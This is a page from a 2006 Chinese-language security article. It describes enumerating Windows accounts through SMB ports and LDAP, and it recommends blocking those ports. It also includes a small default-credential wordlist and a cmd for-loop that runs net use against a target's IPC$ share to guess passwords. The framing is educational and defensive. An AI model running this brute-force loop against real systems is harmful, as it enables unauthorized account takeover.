WEB开发网
开发学院网络安全黑客技术 战术攻防思维撷粹 阅读

战术攻防思维撷粹

 2006-07-04 20:29:28 来源:WEB开发网   
核心提示: )+应对策略只要139端口可访问,sid2user和user2sid就可以搜索出所有合法的用户帐户,战术攻防思维撷粹(5),这种让人心惊的偷窃方式,迫使我们不得不禁用TCP 139和445端口的访问,因此,短短几分钟内,值得一提的是W2K引入了目录服务的概念,于是可以使用LDAP协议通过3

)

+应对策略

只要139端口可访问,sid2user和user2sid就可以搜索出所有合法的用户帐户,这种让人心惊的偷窃方式,迫使我们不得不禁用TCP 139和445端口的访问。

值得一提的是W2K引入了目录服务的概念,于是可以使用LDAP协议通过389端口遍历目录树中所存在的用户和用户组。W2RK工具包中活动目录管理工具ldp.exe可以轻松实现这种功能。下面是ldp运行的一个截图:

通过这种方式,不仅可以浏览全部用户帐户(cn=Users),还可以查询用户更多的信息,比如SID、GUID、帐户名和密码设置类型等重要信息。因此必须对动态目录的访问权限设置限制。

【蚕食密码】

得到合法帐户,下个目标便进入到远程密码猜测的角逐中。这种游戏规则的成功应用通常是建立在系统管理的马虎和疏忽的密码管理机制之中。习惯的密码设置总是不经意的简单思维,下面的两则实验则可以让我们清楚看到自己的密码设置竟然如此脆弱,只需要简单几个循环,堡垒般的系统顷刻崩溃。

我们参照黑客界高频组合的用户/密码对。创建一个wordlist

[file&#58wordlist.txt]
password username
password Administrator
admin Administrator
administrator Administrator
secret Administrator
……

使用for循环进行口令Administrator口令猜解:

C:\toolkit>for /F "tokens=1,2*" %i in (wordlist.txt) do net use \\target\IPC$%i /u:%j

此脚本会分析wordlist.txt中的每一行,通过tokens=1,2*将每行中的第一个符号%i(密码)和第二个符号%j(用户名)传递给 for 程序体;程序把变量带入net use命令中。通过高频组合文件(www.securityparadigm.com/defaultpw.htm),可以意外的发现,网络中居然有大量系统的管理密码居然如此马虎了事。因此,短短几分钟内,目标已经成为囊中之物。

上一页  1 2 3 4 5 6 7  下一页

Tags:战术 攻防 思维

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接